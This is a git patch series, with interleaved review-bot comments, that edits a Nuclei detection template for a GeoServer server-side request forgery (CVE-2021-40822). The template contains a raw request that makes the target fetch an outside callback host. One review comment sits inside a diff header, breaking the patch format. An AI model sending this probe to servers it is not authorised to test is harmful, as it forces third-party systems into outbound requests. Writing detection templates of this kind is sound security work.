From 2cf1d043b7ce1b5b1edf88349627e014bd07dfdb Mon Sep 17 00:00:00 2001
From: aringo
Date: Mon, 10 Jul 2023 13:01:34 -0500
Subject: [PATCH 1/4] Fixed CVE-2021-40822
---
 http/cves/2021/CVE-2021-40822.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml
index 0888e11fad..d3714ad69a 100644
--- a/http/cves/2021/CVE-2021-40822.yaml
+++ b/http/cves/2021/CVE-2021-40822.yaml
@@ -27,7 +27,7 @@ http:
 - raw:
 - |
 POST /geoserver/TestWfsPost HTTP/1.1
- Host: {{Hostname}}
+ Host: {{interactsh-url}}
 Content-Type: application/x-www-form-urlencoded
 form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password=
From 058e02cd68f6911f3c0ff60c7cd4809ec49cb963 Mon Sep 17 00:00:00 2001
From: Aaron Ringo <102995281+aringo-bf@users.noreply.github.com>
Date: Mon, 10 Jul 2023 13:05:51 -0500
Subject: [PATCH 2/4] Update CVE-2021-40822.yaml
---
 http/cves/2021/CVE-2021-40822.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml
index d3714ad69a..657eb6a279 100644
--- a/http/cves/2021/CVE-2021-40822.yaml
+++ b/http/cves/2021/CVE-2021-40822.yaml
@@ -2,7 +2,7 @@ id: CVE-2021-40822
 info:
 name: Geoserver - Server-Side Request Forgery
- author: For3stCo1d
+ author: For3stCo1d, aringo-bf
 severity: high
 description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.
 reference:
From 87bc41c4182d7b7fbcec650cfc62396e39597423 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Tue, 11 Jul 2023 12:14:55 +0530
Subject: [PATCH 3/4] fix matcher
---
 http/cves/2021/CVE-2021-40822.yaml | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)
diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml
index 657eb6a279..b5795efd14 100644
--- a/http/cves/2021/CVE-2021-40822.yaml
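Review bot: The `Host: {{interactsh-url}}` override in the hunk of PATCH 1/4 carries no comment saying why the Host header must differ from the scanned target, so a later cleanup could revert it to `{{Hostname}}` and silently break detection. A YAML comment above `- raw:` (it cannot go inside the `|` block, where it would be sent as part of the request) such as `# Host is set to the callback host on purpose; the url= host has to match it for TestWfsPost to proxy the request` would record the intent; that description of the servlet's check is inferred from the change and should be confirmed against the advisory. A target behind name-based virtual hosting or a CDN may never route a request with a foreign Host header to GeoServer, so the template description should mention that a clean result there is not conclusive. The `http:` block continues outside the hunk.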
+++ b/http/cves/2021/CVE-2021-40822.yaml
@@ -2,7 +2,7 @@ id: CVE-2021-40822
 info:
 name: Geoserver - Server-Side Request Forgery
- author: For3stCo1d, aringo-bf
+ author: For3stCo1d,aringo-bf
 severity: high
 description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.
 reference:
@@ -27,21 +27,22 @@ http:
 - raw:
 - |
 POST /geoserver/TestWfsPost HTTP/1.1
- Host: {{interactsh-url}}
+ Host: oast.pro
 Content-Type: application/x-www-form-urlencoded
- form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password=
+ form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=
 matchers-condition: and
 matchers:
 - type: word
- part: interactsh_protocol # Confirms the HTTP Interaction
+ part: body
 words:
- - "http"
+ - "Interactsh Server"
 - type: word
+ part: header
 words:
- - ""
+ - "text/html"
 - type: status
 status:
From ed22f507dd72442a8f2e300ffb59aa785d7a2d99 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 12 Jul 2023 17:29:22 +0530
Subject: [PATCH 4/4] Update CVE-2021-40822.yaml
---
 http/cves/2021/CVE-2021-40822.yaml | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml
index b5795efd14..ca439dd319 100644
--- a/http/cves/2021/CVE-2021-40822.yaml
+++ b/http/cves/2021/CVE-2021-40822.yaml
@@ -19,15 +19,16 @@ info:
 epss-score: 0.65495
 metadata:
 max-request: 1
- fofa-query: app="GeoServer"
 verified: true
+ shodan-query: title:"GeoServer"
+ fofa-query: app="GeoServer"
 tags: cve,cve2021,ssrf,geoserver
 http:
 - raw:
 - |
 POST /geoserver/TestWfsPost HTTP/1.1
- Host: oast.pro
+ Host: {{oast.pro}}
 Content-Type: application/x-www-form-urlencoded
 form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=
@@ -37,7 +38,7 @@ http:
 - type: word
 part: body
 words:
- - "Interactsh Server"
+ - "Interactsh"
 - type: word
 part: header
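Review bot: Hard-coding `oast.pro` in the `Host:` header and the `url=` parameter (second hunk of PATCH 3/4) replaces the per-scan `{{interactsh-url}}` with one fixed third-party host, and the matchers now read the reflected response (`part: body`, `part: header` with `"text/html"`) instead of confirming an out-of-band interaction. The verdict then depends on that public server being reachable from the target and serving a page with the expected word, so egress filtering, DNS blocking of the domain or a changed landing page yields a false negative; the later matcher hunk in PATCH 4/4, which shortens the word to `"Interactsh"`, inherits the same dependency. A front end that routes on the Host header and forwards the request to that domain could also satisfy all three matchers without GeoServer being involved, and every scan makes the assessed host contact the same external operator. Keeping the original `part: interactsh_protocol` / `- "http"` matcher against `{{interactsh-url}}` alongside the reflected check, or at least a comment explaining why a fixed host is required, would address this. The matcher list continues past the end of the hunk.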
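Review bot: `Host: {{oast.pro}}` in the first hunk of PATCH 4/4 turns the literal host into a template placeholder, and nothing visible in these hunks defines a variable named `oast.pro`, while the `url=` parameter two lines below still uses the bare `oast.pro`. Depending on how the engine treats an unresolved placeholder, the request is either not sent or goes out with the braces in the Host header, and in both cases Host no longer equals the `url=` host that the earlier patches kept identical. Use `Host: oast.pro` so the two agree, or restore `{{interactsh-url}}` in both places.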